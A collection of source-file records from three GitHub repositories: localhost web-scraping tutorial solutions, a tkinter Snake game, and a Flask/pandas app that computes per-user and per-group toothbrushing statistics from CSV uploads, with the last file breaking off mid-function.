"text": "from gazpacho import get, Soup\n\nurl = \"http://localhost:5000/table\"\nhtml = get(url)\n\nsoup = Soup(html)\n\nsoup.find(\"td\", {'class': \"creature-name\"})\n\ntable = soup.find(\"table\")\ntrs = table.find(\"tr\")[1:]\n\ntr = trs[0]\n\nname = tr.find(\"td\", {\"class\": \"creature\"}, strict=False).text\nhabitat = tr.find(\"td\")[-1].text\n\ndef parse_tr(tr):\n name = tr.find(\"td\", {\"class\": \"creature\"}, strict=False).text\n habitat = tr.find(\"td\")[-1].text\n return name, habitat\n\n[parse_tr(tr) for tr in trs]\n\n####\n\nimport pandas as pd\n\ndf = pd.read_html(str(table))[0]\n"
},
{
"alpha_fraction": 0.6654275059700012,
"alphanum_fraction": 0.6765799522399902,
"avg_line_length": 18.925926208496094,
"blob_id": "7140e14563541a9108d2195e9915c3f94261b648",
"content_id": "634bb5245583dda9efbaab94277d0c738b46800a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 27,
"path": "/solutions/04_ocr.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from urllib.request import urlopen\nfrom gazpacho import get, Soup\nfrom PIL import Image # pip install pillow\nimport pytesseract # pip install pytesseract\n\nbase = 'http://localhost:5000'\nurl = base + '/ocr'\nhtml = get(url)\nsoup = Soup(html)\n\nsoup.find(\"img\")\n\nimgs = soup.find('img')\npaths = [i.attrs['src'] for i in imgs]\n\nimages = []\nfor path in paths:\n url = base + path\n im = Image.open(urlopen(url))\n images.append(im)\n\ntext = ''\nfor image in images:\n i2t = pytesseract.image_to_string(image)\n text += i2t\n\nprint(text)\n"
},
{
"alpha_fraction": 0.6332046389579773,
"alphanum_fraction": 0.6563706398010254,
"avg_line_length": 16.266666412353516,
"blob_id": "f0c8fa7f0e870992adb78bc987f3d7e1dd7b490e",
"content_id": "7d52d460ffc5e3963a4d456194a22bb00f3cf9c0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 259,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 15,
"path": "/solutions/01_page.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from gazpacho import get, Soup\n\nurl = \"http://localhost:5000/page\"\nhtml = get(url)\n\nprint(html)\n\nsoup = Soup(html)\n\nsoup.find(\"div\").find(\"li\")[2]\n\ncreatures = soup.find(\"div\").find(\"li\")\ngorgons = creatures[2].find(\"ul\")\n\n[g.text for g in gorgons.find(\"a\")]\n"
}
] | 9 |
FlorianCahay/Snake | https://github.com/FlorianCahay/Snake | 8b964642c3dc74bd490240980754c2ba6c585a23 | f67354460e40b11f55b4c93c9755933f9065e0b1 | 50c218b9bf66727f4d1f3a6e67f26397e8825e9e | refs/heads/master | 2022-02-13T20:48:26.413882 | 2022-02-01T18:06:27 | 2022-02-01T18:06:27 | 185,679,758 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.46724891662597656,
"alphanum_fraction": 0.48384279012680054,
"avg_line_length": 26.90243911743164,
"blob_id": "97c82be9fb76f7a2ad8bf6e8625dca64ce6aefdc",
"content_id": "460415971b4ceabdb9e7e72f4bbbe93b054be7b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1148,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 41,
"path": "/Snake.py",
"repo_name": "FlorianCahay/Snake",
"src_encoding": "UTF-8",
"text": "class Snake:\n def __init__(self, length):\n self.body = []\n self.length = length\n\n def move(self, direction):\n \"\"\"\n Déplace le serpent d'une case dans la direction donnée\n :param direction:\n :return:\n \"\"\"\n last_box = self.body[-1]\n if direction == \"Right\":\n self.body.append((last_box[0] + 1, last_box[1]))\n elif direction == \"Left\":\n self.body.append((last_box[0] - 1, last_box[1]))\n elif direction == \"Down\":\n self.body.append((last_box[0], last_box[1] + 1))\n elif direction == \"Up\":\n self.body.append((last_box[0], last_box[1] - 1))\n self.body.pop(0)\n\n def has_bitten(self):\n \"\"\"\n Vérifie si le serpent s'est mordu\n :return:\n \"\"\"\n head = self.body[-1]\n if head in self.body[:-1]:\n return True\n return False\n\n def eat(self, x, y):\n \"\"\"\n Mange une pomme et allonge la taille du serpent de 3\n :param x:\n :param y:\n :return:\n \"\"\"\n for i in range(3):\n self.body.insert(0, (x, y))\n\n"
},
{
"alpha_fraction": 0.5287559628486633,
"alphanum_fraction": 0.5436549186706543,
"avg_line_length": 33.6534309387207,
"blob_id": "16181a605ac278518e23b69082cc592d444e3605",
"content_id": "947c8540aa57ec21711ffaf67e1e394aa5412ebe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9619,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 277,
"path": "/Main.py",
"repo_name": "FlorianCahay/Snake",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nfrom tkinter import font\nfrom random import randint\nfrom Snake import Snake\n\n\nclass Interface:\n \"\"\"\n GUI\n \"\"\"\n\n def __init__(self):\n self.display_menu()\n self.window.mainloop()\n\n def init_var(self):\n \"\"\"\n Initialise les variables essentielles\n :return:\n \"\"\"\n self.difficulty = 1\n self.level = 1\n self.direction = \"Right\"\n\n def display_menu(self):\n \"\"\"\n Affiche la fenêtre de menu pour sélectionner la difficulté\n :return:\n \"\"\"\n self.init_var()\n if hasattr(self, 'window'):\n self.window.destroy()\n self.window = Tk()\n self.window.focus_force()\n self.window.resizable(0, 0)\n screen_length = 400\n widthBox = screen_length//(screen_length//10)\n self.canvas_menu = Canvas(self.window, width=screen_length, height=screen_length)\n self.canvas_menu.pack()\n self.set_font(\"Purisa\", 24)\n\n self.canvas_menu.create_text(screen_length//2, screen_length//6, text=\"SNAKE\", fill='green',\n font=self.font_title)\n easy = Button(self.canvas_menu, text=\"EASY\", width=widthBox*3, activebackground=\"#d1d1d1\",\n command=lambda: self.select_difficulty(1))\n self.canvas_menu.create_window(screen_length//2, screen_length//3+50, window=easy)\n medium = Button(self.canvas_menu, text=\"MEDIUM\", width=widthBox*3, activebackground=\"#d1d1d1\",\n command=lambda: self.select_difficulty(2))\n self.canvas_menu.create_window(screen_length//2, screen_length//3+100, window=medium)\n hard = Button(self.canvas_menu, text=\"HARD\", width=widthBox*3, activebackground=\"#d1d1d1\",\n command=lambda: self.select_difficulty(3))\n self.canvas_menu.create_window(screen_length//2, screen_length//3+150, window=hard)\n\n def select_difficulty(self, difficulty):\n \"\"\"\n Initialise la difficulté\n :param difficulty:\n :return:\n \"\"\"\n self.difficulty = difficulty\n self.canvas_menu.destroy()\n self.init_window()\n\n def set_font(self, _font, size):\n \"\"\"\n Créer des polices d'écritures\n :param _font:\n :param size:\n :return:\n \"\"\"\n self.font = font.Font(self.window, font=(_font, size))\n self.font.height = self.font.metrics(\"linespace\")\n self.font_title = font.Font(self.window, font=(_font, size*2))\n\n def init_window(self):\n \"\"\"\n Initialise la fenêtre du jeu en fonction de la diffculté choisie\n :param difficulty:\n :return:\n \"\"\"\n if hasattr(self, 'window'):\n self.window.destroy()\n self.window = Tk()\n self.window.focus_force()\n self.window.resizable(0, 0)\n self.set_font(\"Purisa\", 24)\n if self.difficulty == 1:\n self.screen_length = 800\n elif self.difficulty == 2:\n self.screen_length = 600\n elif self.difficulty == 3:\n self.screen_length = 400\n self.squares = self.screen_length // 10\n self.widthBox = self.screen_length // self.squares\n self.canvas = Canvas(self.window, width=self.screen_length, height=self.screen_length)\n self.canvas.pack()\n\n self.display_level_information(self.level)\n\n def display_level_information(self, level):\n \"\"\"\n Affiche une fenêtre avant le début du niveau\n :param level:\n :return:\n \"\"\"\n self.canvas.delete(ALL)\n self.window.bind(\"<Key-space>\", self.start)\n self.canvas.create_text(self.screen_length//2, self.screen_length//3, text=\"LEVEL \" + str(level),\n font=self.font_title, fill='blue')\n self.canvas.create_text(self.screen_length // 2, self.screen_length // 2, text='Ready ? 
Press « space »',\n font=self.font, fill='black')\n\n def start(self, event):\n \"\"\"\n Affiche le serpent au centre de la fenêtre\n :param event:\n :param snake:\n :return:\n \"\"\"\n self.window.unbind(\"<Key-space>\")\n self.window.bind(\"<KeyPress>\", self.eval_key)\n self.canvas.delete(ALL)\n self.snake = Snake(10)\n self.apples = self.create_apples(5 * self.level)\n\n center = self.squares//2\n self.snake.body = [(center, center)]\n for x in range(1, self.snake.length//2 + 1):\n self.snake.body.insert(0, (center-x, center))\n for x in range(1, self.snake.length//2):\n self.snake.body.append((center + x, center))\n self.display()\n self.animation()\n\n def create_apples(self, number):\n \"\"\"\n Initialise une liste contenant les positions des pommes\n :param number:\n :return:\n \"\"\"\n apples = []\n for x in range(number):\n x, y = randint(0, self.squares-1), randint(0, self.squares-1)\n apples.append((x, y))\n return apples\n\n def eat_apple(self):\n \"\"\"\n Mange une pomme\n :return:\n \"\"\"\n for apple in self.apples:\n if apple in self.snake.body:\n end = self.snake.body[0]\n self.apples.remove(apple)\n self.snake.eat(end[0], end[1])\n\n def is_out(self, l):\n \"\"\"\n Vérifie si la tête du serpent est sortie de la zone\n :param l:\n :return:\n \"\"\"\n head = l[-1]\n if head[0] >= self.squares or head[0] < 0 or head[1] >= self.squares or head[1] < 0:\n return True\n return False\n\n def display_one_box(self, box, color):\n \"\"\"\n Affiche une case dans une couleur donnée\n :param box:\n :param color:\n :return:\n \"\"\"\n self.canvas.create_rectangle(box[0] * self.widthBox,\n box[1] * self.widthBox,\n box[0] * self.widthBox + (self.widthBox-1),\n box[1] * self.widthBox + (self.widthBox-1),\n fill=color,\n outline=color)\n\n def display_list(self, l, color):\n \"\"\"\n Affiche en couleur toutes les cases de la liste\n :param l:\n :param color:\n :return:\n \"\"\"\n for box in l:\n self.display_one_box(box, color)\n\n def display_snake(self, l):\n \"\"\"\n Affiche le serpent avec le corp en vert et la tête en bleu\n :param l:\n :return:\n \"\"\"\n self.display_list(l[:-1], 'green')\n self.display_one_box(l[-1], 'blue')\n\n def display(self):\n \"\"\"\n Rafraîchit l'affichage\n :return:\n \"\"\"\n self.canvas.delete(ALL)\n self.display_snake(self.snake.body)\n self.display_list(self.apples, 'red')\n\n def eval_key(self, event):\n \"\"\"\n Change la direction du serpent en fonction de la touche appuyée\n :param event:\n :return:\n \"\"\"\n if event.keysym in [\"Up\", \"Right\", \"Down\", \"Left\"]:\n self.snake.move(self.direction)\n self.direction = event.keysym\n\n def animation(self):\n \"\"\"\n Boucle principale\n :return:\n \"\"\"\n if self.is_out(self.snake.body) or self.snake.has_bitten():\n self.defeat()\n return\n if len(self.apples) == 0:\n self.victory()\n return\n self.snake.move(self.direction)\n self.eat_apple()\n self.display()\n self.window.after(40, self.animation)\n\n def next_level(self):\n \"\"\"\n Lance le niveau supérieur\n :return:\n \"\"\"\n self.level += 1\n self.direction = \"Right\"\n self.display_level_information(self.level)\n\n def defeat(self):\n \"\"\"\n Affiche le message de défaite\n :return:\n \"\"\"\n self.canvas.create_rectangle(self.screen_length//5, self.screen_length//5, self.screen_length//5*4,\n self.screen_length//5*4, fill='white')\n self.canvas.create_text(self.screen_length//2, self.screen_length//3, text=\"GAME OVER\", font=self.font,\n fill='red')\n menu = Button(self.canvas, text=\"Back to menu\", width=self.widthBox * 2, 
activebackground=\"#d1d1d1\",\n command=self.display_menu)\n self.canvas.create_window(self.screen_length // 2, self.screen_length // 2 + 100, window=menu)\n\n def victory(self):\n \"\"\"\n Affiche le message de victoire\n :return:\n \"\"\"\n self.canvas.create_rectangle(self.screen_length//5, self.screen_length//5, self.screen_length//5*4,\n self.screen_length//5*4, fill='white')\n self.canvas.create_text(self.screen_length//2, self.screen_length//3, text=\"VICTORY\", font=self.font,\n fill='green')\n next_level = Button(self.canvas, text=\"Next level\", width=self.widthBox * 2, activebackground=\"#d1d1d1\",\n command=self.next_level)\n self.canvas.create_window(self.screen_length // 2, self.screen_length // 2 + 50, window=next_level)\n menu = Button(self.canvas, text=\"Back to menu\", width=self.widthBox * 2, activebackground=\"#d1d1d1\",\n command=self.display_menu)\n self.canvas.create_window(self.screen_length // 2, self.screen_length // 2 + 100, window=menu)\n\n\nif __name__ == '__main__':\n Interface()"
},
{
"alpha_fraction": 0.6824966073036194,
"alphanum_fraction": 0.719131588935852,
"avg_line_length": 29.70833396911621,
"blob_id": "afdb3ecae1b139cf424d47173dd305895eb86594",
"content_id": "00032b65a7d887237832c34d4d77638569495e12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 745,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 24,
"path": "/README.md",
"repo_name": "FlorianCahay/Snake",
"src_encoding": "UTF-8",
"text": "<div id=\"title\" align=\"center\">\n <h1>SNAKE</h1>\n <h4>Jeu du <a href=\"https://fr.wikipedia.org/wiki/Snake_(genre_de_jeu_vid%C3%A9o)\">Snake</a> en python3 avec tkinter</h4>\n <img alt=\"demo\" src=\"img.png\">\n \n</div>\n\n## But\nManger toutes les pommes du niveau pour accèder au niveau supérieur.\n\n## Règles\nLe joueur perd s'il fonce dans un mur ou s'il essaie de se manger.<br>\nQuand le serpent mange une pomme, il grandit de 3 cases.<br>\nIl faut utiliser les flèches directionnelles pour choisir la direction du serpent.<br>\n<br>\nOn peut choisir entre 3 difficultés différentes (la difficulté change la taille de l'écran) :\n- Facile (800x800)\n- Moyen (600x600)\n- Difficile (400x400)\n\n## Execution du programme\n```python\npython Main.py\n```\n"
}
] | 3 |
AdrianPayne/Data-API-Flask-Pandas | https://github.com/AdrianPayne/Data-API-Flask-Pandas | 7d0a5994dea0e410cb15a925b7c0d9d4165ec44b | a5caf2739ab0ca486e1e94d8364ef909b03eeffd | 822bf7939c6b03992e8d6080b4dbe1e8a9e53dd5 | refs/heads/main | 2023-04-25T12:20:05.903610 | 2021-05-15T13:36:18 | 2021-05-15T13:36:18 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.31305375695228577,
"alphanum_fraction": 0.654459536075592,
"avg_line_length": 35.40860366821289,
"blob_id": "edd7b5911b00ed0dc000c41371245c5c225606e4",
"content_id": "fb8007af0435be84204348d399c3ad3d17cff175",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6772,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 186,
"path": "/README.md",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "# playbrush\n## Description\nFrom two .csv files (the first file contains offline brushing data of all participants in a\ntoothbrushing study while the second one allocates the participants into groups), the tasks\nis to extract information for each participant (identified by their PlaybrushID) and provide meaningful\ninformation that can be communicated to the user via a newsletter.\n\n## WEB APP\n### AWS url\nhttp://3.17.77.92:32768/\n\n### Local deploy\n>docker-compose build && docker-compose up \n\nurl: localhost:5000\n\n### Web documentation\nOnly one resource \n>'/'\n\n#### Method GET\nForm with two csv file inputs:\n+ rawdata\n+ groups\n\nPost submit button\n\n#### Method POST\nPrint user and group week statistical data tables\n\n### Design considerations\nAs web app requirements are simple and short, these tools has been used:\n+ Back: Flask\n+ Front: Jinja2 templates (provided by Flask)\n+ Docker to encapsulate and install the requirements\n+ GitHub actions to automate deployment in AWS ECR/ECS services (EC2 instance). Deployed with each new release!\n\n### Next steps\n+ CSS style\n+ Plot figures\n+ Test suit!!!!!\n\n## DATA TASKS\n#### Example of input & output\n -INPUT-\n RAWDATA\n PlaybrushID,TimestampUTC,UpTime,DownTime,LeftTime,RightTime,NoneTime,\n PB2500017115,Mon Sep 18 2017 08:03:18 GMT+0100 (BST),6.6,0.1,0.3,0.3,5.7,\n PB2500017115,Mon Sep 18 2017 08:06:32 GMT+0100 (BST),0,3.8,1.8,0,1.4,\n ...\n \n GROUPDATA\n group,PBID\n D,PB2500036964\n D,PB2500036963\n ...\n \n -OUTPUT-\n # Task 1 - User Information\n group, PBID, mon, tue, wed, thu, fri, sat, sun, total-brushes, twice-brushes, avg-brush-time\n \n # Task 2 - Group Dynamics\n group, total-brushes, avg-brushes, avg-brush-time, score-performance\n\n### Results\n Task 1\n group,PBID,mon,tue,wed,thu,fri,sat,sun,total-brushes,twice-brushes,avg-brush-time\n A,PB2500008778,0,0,1,1,0,0,1,3,0,37.05\n A,PB2500009123,0,1,1,1,1,1,1,6,0,50.88\n A,PB2500009543,0,0,1,1,0,1,0,3,0,44.67\n A,PB2500010644,0,0,1,1,1,0,1,4,0,55.75\n A,PB2500013900,1,0,0,0,0,0,0,1,0,35.10\n A,PB2500014533,1,0,0,0,0,0,0,1,0,45.20\n A,PB2500015032,0,2,2,0,0,0,0,4,2,33.32\n A,PB2500015176,0,0,0,0,0,2,1,3,1,21.39\n A,PB2500016085,0,0,0,0,1,0,0,1,0,28.70\n A,PB2500016302,0,0,0,1,2,1,2,6,2,48.16\n A,PB2500016413,0,1,0,0,0,1,1,3,0,83.37\n A,PB2500017260,1,1,0,0,0,0,0,2,1,60.10\n A,PB2500029113,0,2,1,0,1,0,0,4,1,25.87\n A,PB2500029403,1,0,0,0,0,0,0,1,0,24.00\n A,PB2500029467,0,0,0,0,1,2,0,3,1,31.31\n A,PB2500029535,0,0,0,0,0,0,1,1,0,35.00\n A,PB2500030275,0,0,0,0,0,0,1,1,0,43.05\n A,PB2500034769,0,0,0,2,0,0,0,2,2,53.50\n A,PB2500034873,1,0,2,1,1,0,1,6,1,83.46\n A,PB2500035145,0,1,1,0,1,1,2,6,1,83.53\n A,PB2500036593,0,0,0,0,0,0,1,1,0,30.05\n B,PB2500008735,0,0,0,0,1,0,0,1,0,35.05\n B,PB2500008867,0,0,0,1,0,1,0,2,1,27.02\n B,PB2500009228,0,0,0,2,0,0,0,2,2,38.62\n B,PB2500009352,0,0,0,0,0,1,0,1,0,94.05\n B,PB2500009374,0,0,1,1,1,1,0,4,0,32.27\n B,PB2500009705,0,0,0,0,0,1,1,2,1,59.03\n B,PB2500009814,1,0,0,0,0,0,0,1,0,22.00\n B,PB2500010542,0,0,0,0,1,1,1,3,0,100.77\n B,PB2500010629,0,0,0,0,2,1,2,5,2,81.66\n B,PB2500014851,0,0,1,0,0,0,0,1,0,28.05\n B,PB2500017115,1,1,0,1,1,0,0,4,0,64.35\n B,PB2500029003,0,0,0,1,0,0,0,1,0,45.05\n B,PB2500029118,0,1,2,2,2,2,2,11,5,79.42\n B,PB2500029572,0,0,0,0,1,0,1,2,1,30.52\n B,PB2500029755,0,0,0,0,1,0,0,1,0,64.05\n B,PB2500034402,0,0,0,0,0,0,1,1,0,24.00\n B,PB2500035239,1,2,1,1,0,0,1,6,1,122.92\n B,PB2500035308,0,0,0,1,1,1,0,3,0,36.72\n B,PB2500035330,0,0,0,0,0,1,0,1,0,20.95\n B,PB2500035411,0,0,0,1,2,1,1,5,1,60.34\n 
B,PB2500036585,0,0,0,0,1,1,0,2,1,28.52\n B,PB2500036671,0,0,0,1,0,1,0,2,1,71.95\n C,PB2500008196,0,0,0,1,1,2,1,5,1,55.38\n C,PB2500008248,0,0,0,2,2,2,2,8,4,56.02\n C,PB2500008549,0,1,2,1,1,1,2,8,2,44.53\n C,PB2500008951,2,2,1,2,2,1,2,12,5,59.80\n C,PB2500008956,0,0,0,1,2,1,2,6,2,108.62\n C,PB2500009101,0,2,2,2,1,1,1,9,3,67.06\n C,PB2500009201,0,1,2,2,2,2,2,11,5,128.25\n C,PB2500009375,0,0,0,0,0,2,2,4,2,77.49\n C,PB2500010328,0,0,2,2,1,1,1,7,2,39.66\n C,PB2500010630,0,1,0,2,1,2,0,6,2,38.60\n C,PB2500014415,0,0,0,1,1,1,0,3,0,52.02\n C,PB2500014442,0,0,0,2,1,1,2,6,2,73.16\n C,PB2500014740,0,0,0,2,2,2,2,8,4,95.82\n C,PB2500016077,0,2,0,0,1,2,0,5,2,27.53\n C,PB2500016479,0,0,0,1,1,0,1,3,0,48.35\n C,PB2500029848,0,0,0,0,1,2,2,5,2,88.74\n C,PB2500034762,0,0,0,0,0,2,2,4,2,113.04\n C,PB2500034890,0,0,0,1,2,2,2,7,3,52.03\n C,PB2500034972,0,1,2,2,2,2,1,10,4,122.95\n C,PB2500035170,0,1,2,2,1,1,2,9,3,77.76\n C,PB2500036366,0,0,0,0,0,0,1,1,0,89.00\n C,PB2500036703,0,0,0,1,2,2,2,7,3,55.78\n C,PB2500036788,2,2,2,2,2,1,2,13,6,88.24\n D,PB2500008565,1,2,2,1,2,2,1,11,4,78.99\n D,PB2500009146,0,2,2,2,2,0,0,8,4,130.01\n D,PB2500009220,0,0,0,1,1,0,0,2,1,42.05\n D,PB2500009446,0,0,0,0,1,2,2,5,2,114.91\n D,PB2500009709,0,0,0,2,1,2,2,7,3,73.78\n D,PB2500010636,0,0,0,1,0,0,0,1,0,24.05\n D,PB2500014435,0,1,2,0,0,2,2,7,3,33.16\n D,PB2500014494,0,2,2,2,2,1,2,11,5,83.89\n D,PB2500014596,0,0,0,0,1,1,1,3,0,48.02\n D,PB2500014762,0,0,0,0,1,2,1,4,1,137.70\n D,PB2500016490,0,2,0,1,1,1,1,6,1,56.82\n D,PB2500017485,0,0,0,0,1,2,2,5,2,73.93\n D,PB2500029001,0,0,0,1,1,2,2,6,2,52.42\n D,PB2500029510,2,0,1,0,0,0,0,3,1,26.75\n D,PB2500029526,0,0,0,0,1,2,1,4,1,86.71\n D,PB2500030280,0,1,2,0,2,2,1,8,3,52.90\n D,PB2500034756,0,0,0,0,0,1,2,3,1,133.88\n D,PB2500034872,1,1,2,1,1,2,1,9,2,64.79\n D,PB2500035119,0,0,1,1,1,0,2,5,1,56.94\n D,PB2500035317,0,0,0,2,2,1,1,6,2,83.39\n D,PB2500035373,1,2,2,2,2,2,2,13,6,49.35\n D,PB2500035479,0,0,0,2,1,2,1,6,2,64.34\n D,PB2500036660,0,1,2,2,2,2,2,11,5,103.23\n D,PB2500036764,0,0,0,0,1,0,0,1,0,64.05\n D,PB2500036963,0,2,1,2,2,1,1,9,3,25.69\n D,PB2500036964,0,0,0,0,2,2,2,6,3,119.88\n\n---\n\n Task 2\n group,total-brushes,avg-brush-time,avg-brushes,score-performance\n C,157,72.17,6.83,492.61\n D,160,72.37,6.15,445.35\n B,61,53.06,2.77,147.12\n A,62,45.40,2.95,134.05\n\n\n### Execute in local\n+ Create a virtual environment \n > python3 -m venv /path/to/new/virtual/env\n+ Install project dependencies \n >pip install -r playbrush_api/requirements.txt\n+ Execute task.py\n >python3 data_tasks.py\n\n### Design considerations\n+ Python 3.7.7\n+ Use of Pandas and Numpy libraries because include cleaning, transforming, manipulating and analyzing data \nefficient methods\n+ Use of FP (avoiding POO) to make the code easier to read (jupyter notebook style) and not affecting performance\n+ For question:\n >Which group performed the best?\n + The option that does not penalize for the number of members within each group has been selected, the result of multiplying the brushing averages and time per brushing per user\n"
},
{
"alpha_fraction": 0.6171039938926697,
"alphanum_fraction": 0.622934877872467,
"avg_line_length": 29.264705657958984,
"blob_id": "6f08a053ef7257d50b275c852c88ca06a8524c5e",
"content_id": "900b2ad93890909681877a039e4312a1be359525",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1029,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 34,
"path": "/playbrush_api/app.py",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "import io\nfrom flask import Flask, render_template, request\n\nfrom brush_stats import week_stats\n\napp = Flask(__name__)\n\n\[email protected](\"/\", methods=(\"GET\", \"POST\"))\ndef week_stats_view():\n if request.method == \"GET\":\n return render_template('main.html')\n\n elif request.method == \"POST\":\n\n rawdata_csv = request.files[\"rawdata\"]\n groups_csv = request.files[\"groupsdata\"]\n\n rawdata_csv = io.StringIO(rawdata_csv.stream.read().decode(\"UTF8\"), newline=None)\n groups_csv = io.StringIO(groups_csv.stream.read().decode(\"UTF8\"), newline=None)\n\n try:\n user_stats, group_stats = week_stats(rawdata_csv, groups_csv)\n error_message = None\n except:\n user_stats= None\n group_stats = None\n error_message='ERROR WITH CSV FILES. Upload them again'\n\n return render_template('main.html', user_stats=user_stats, group_stats=group_stats, error_message=error_message)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n"
},
{
"alpha_fraction": 0.6209677457809448,
"alphanum_fraction": 0.6317204236984253,
"avg_line_length": 25.571428298950195,
"blob_id": "dac1969d6f8a6c0ae2788b10d4e4226dbc1eb2af",
"content_id": "c477edee2f8d08c44eee348d41d5ab4da809fbd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 14,
"path": "/data_tasks.py",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "from playbrush_api.brush_stats import week_stats\n\nif __name__ == \"__main__\":\n\n raw_path = 'data/1_rawdata.csv'\n group_path = 'data/2_groups.csv'\n\n with open(raw_path) as raw_csv, open(group_path) as groups_csv:\n user_stats, group_stats = week_stats(raw_csv, groups_csv)\n\n print('Task 1')\n print(user_stats)\n print('Task 2')\n print(group_stats)\n"
},
{
"alpha_fraction": 0.5822784900665283,
"alphanum_fraction": 0.607594907283783,
"avg_line_length": 18.75,
"blob_id": "9487db11ef00a82596c22c1266ae448feeda6d6d",
"content_id": "36782e5f5054fb373b2e55530879b19d23ae5db3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 79,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 4,
"path": "/playbrush_api/__init__.py",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "from .brush_stats import week_stats\n\n__version__ = '2.0'\n__author__ = 'Adrian Sacristan'\n"
},
{
"alpha_fraction": 0.43023255467414856,
"alphanum_fraction": 0.5174418687820435,
"avg_line_length": 18.11111068725586,
"blob_id": "72dc911c96d0fe81f6305fec7985a0c5cec3f9e8",
"content_id": "0e8451b6f4a9c090ca149afed87ac7056d0291e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/docker-compose.yml",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "version: '3.8'\nservices:\n api-playbrush:\n build: ./playbrush_api/\n ports:\n - 5000:5000\n environment:\n PORT: 5000\n FLASK_DEBUG: 1\n"
},
{
"alpha_fraction": 0.6043665409088135,
"alphanum_fraction": 0.6094938516616821,
"avg_line_length": 46.234375,
"blob_id": "57fc5730632a2f711c9761ebc14d07d27393e411",
"content_id": "d277a00e0159c59d16a238c052bd4ec14b3eecf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6046,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 128,
"path": "/playbrush_api/brush_stats.py",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport warnings\n\npd.options.mode.chained_assignment = None\nwarnings.simplefilter(action='ignore', category=pd.errors.PerformanceWarning)\n\n\ndef preprocess_data(raw_df, groups_df):\n \"\"\"Steps:\n Clean NaN\n Def time variable\n Sort\n \"\"\"\n # Clean NaN\n raw_df = raw_df.dropna()\n groups_df = groups_df.dropna()\n\n # Def time variable\n raw_df['TimestampUTC'] = pd.to_datetime(raw_df['TimestampUTC'])\n\n # POSSIBLE EXCEPTION: disorder\n return raw_df.sort_values(by=['PlaybrushID', 'TimestampUTC']), groups_df.sort_values(by=['group', 'PBID'])\n\n\ndef week_stats(raw_csv, groups_csv):\n \"\"\"\n Provides two CSV files with user and group week statistic data\n :param raw_csv:\n :param groups_csv:\n :return:\n \"\"\"\n # Task 1 - User Information\n # OUT: group, PBID, mon, tue, wed, thu, fri, sat, sun, total-brushes, twice-brushes, avg-brush-time\n\n # Read CSV & convert to DataFrame\n raw_df = pd.read_csv(raw_csv, usecols=range(7))\n groups_df = pd.read_csv(groups_csv)\n\n raw_df, groups_df = preprocess_data(raw_df, groups_df)\n\n # Merge brush sessions that are less than 2minutes apart into a single brush session\n threshold_selector_time = (raw_df.TimestampUTC - raw_df.TimestampUTC.shift(1)) > pd.Timedelta(seconds=120)\n threshold_selector_user = raw_df.PlaybrushID != raw_df.PlaybrushID.shift(1)\n groups_time = threshold_selector_time.cumsum()\n groups_user = threshold_selector_user.cumsum()\n raw_df = raw_df.groupby([groups_time, groups_user]).agg({'PlaybrushID': min, 'TimestampUTC': min, 'UpTime': sum,\n 'DownTime': sum, 'LeftTime': sum, 'RightTime': sum,\n 'NoneTime': sum})\n\n # Sum all movements times\n raw_df['brush_time'] = raw_df[['UpTime', 'DownTime', 'LeftTime', 'RightTime', 'NoneTime']].sum(axis=1)\\\n .drop(columns=['UpTime', 'DownTime', 'LeftTime', 'RightTime', 'NoneTime'])\n\n # Discard brush sessions that are less than 20 seconds in total\n raw_df = raw_df[raw_df['brush_time'] >= 20.0]\n\n # When a user brushes multiple times in a morning or an evening, record the longest brush and discard\n # the others. 
